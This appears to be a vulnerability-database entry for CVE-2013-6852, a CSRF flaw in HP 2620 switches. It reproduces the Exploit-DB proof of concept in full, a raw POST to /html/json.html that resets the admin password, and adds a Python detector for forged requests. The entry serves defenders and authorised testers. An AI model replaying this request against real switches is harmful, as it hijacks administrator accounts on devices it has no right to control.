CVE-2013-6852

medium
Published 2013-11-22 · Modified 2026-04-29
CVSS v3
—
CVSS v4 NEW
—
not yet in upstream
VIR risk
7.8

Description

Cross-site request forgery (CSRF) vulnerability in html/json.html on HP 2620 switches allows remote attackers to hijack the authentication of administrators for requests that change an administrative password via the setPassword method.

Predictions

Exploit likelihood
20%
Patch ETA
—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-28562 webapps hardware text · 1 KB
Hubert Gradek · 2013-09-26

Hewlett-Packard (HP) 2620 Switch Series. Edit Admin Account - Cross-Site Request Forgery

text exploit Source: Exploit-DB
# Exploit Title: Hewlett-Packard 2620 Switch Series. Edit Admin Account - CSRF Vulnerability
# Date: 26.09.2013r.
# Exploit Author: Hubert Grądek (PL)
# Software Link: [download link if available]
# Tested on: HP-E2620 24-PoEP //  RA.15.05.0006,ROMRA.15.10

HTTP Headers:

http://[IP_ADDR]/html/json.html

Host: [IP_ADDR]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://[IP_ADDR]/html/nhome.html
Cookie: sessionId=ANYTHING
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

POST Content:

method:setPassword&name=admin&password=newpassword&ext-comp-1171=newpassword&access=Manager
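As an added defensive example (not part of the Exploit-DB entry or this advisory), the Python below flags the request pattern shown above when it arrives with a foreign Origin or Referer, which is what a browser attaches to a forged cross-site POST. It assumes a reverse proxy or network sensor in front of the switch that records method, path, Host, Origin, Referer and the form body as one dict per request; the sample records are constructed, not captured traffic.

```python
import re
from urllib.parse import urlsplit

TARGET_PATH = "/html/json.html"
# The published PoC writes the field as "method:setPassword"; accept "=" too.
SET_PASSWORD = re.compile(r"(?:^|&)method[=:]setPassword(?:&|$)")


def _host_of(url: str) -> str:
    """Host[:port] of an absolute URL, lower-cased; '' when absent."""
    return urlsplit(url).netloc.lower() if url else ""


def classify(req: dict) -> str:
    """Verdict for one observed request: 'ok', 'cross-site' or 'no-origin'."""
    if req.get("method") != "POST" or req.get("path") != TARGET_PATH:
        return "ok"
    if not SET_PASSWORD.search(req.get("body", "")):
        return "ok"
    # A browser stamps a forged POST with the *attacking* page's origin, so an
    # Origin/Referer host other than the switch itself is the CSRF signal.
    origin = _host_of(req.get("origin", "")) or _host_of(req.get("referer", ""))
    if not origin:
        return "no-origin"          # cannot vouch for it; review manually
    return "ok" if origin == req.get("host", "").lower() else "cross-site"


def scan(records):
    """(index, verdict) for every record that is not plainly 'ok'."""
    return [(i, v) for i, r in enumerate(records) if (v := classify(r)) != "ok"]

# Constructed sample traffic (hypothetical hosts): a legitimate change from the
# UI, a forged POST from another site using the PoC body, a client that sent no
# origin information, and an unrelated page load.
SAMPLES = [
    {"method": "POST", "path": "/html/json.html", "host": "10.0.0.5",
     "referer": "http://10.0.0.5/html/nhome.html",
     "body": "method:setPassword&name=admin&password=x&access=Manager"},
    {"method": "POST", "path": "/html/json.html", "host": "10.0.0.5",
     "origin": "http://evil.example", "referer": "http://evil.example/a.html",
     "body": "method:setPassword&name=admin&password=x&access=Manager"},
    {"method": "POST", "path": "/html/json.html", "host": "10.0.0.5",
     "body": "method=setPassword&name=admin&password=x&access=Manager"},
    {"method": "GET", "path": "/html/nhome.html", "host": "10.0.0.5"},
]

if __name__ == "__main__":
    for idx, verdict in scan(SAMPLES):
        print(f"record {idx}: {verdict}")
```

The same host comparison, enforced rather than logged at the proxy, is the stop-gap for a device that does not validate Origin itself.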

References

CWEs

CWE-352
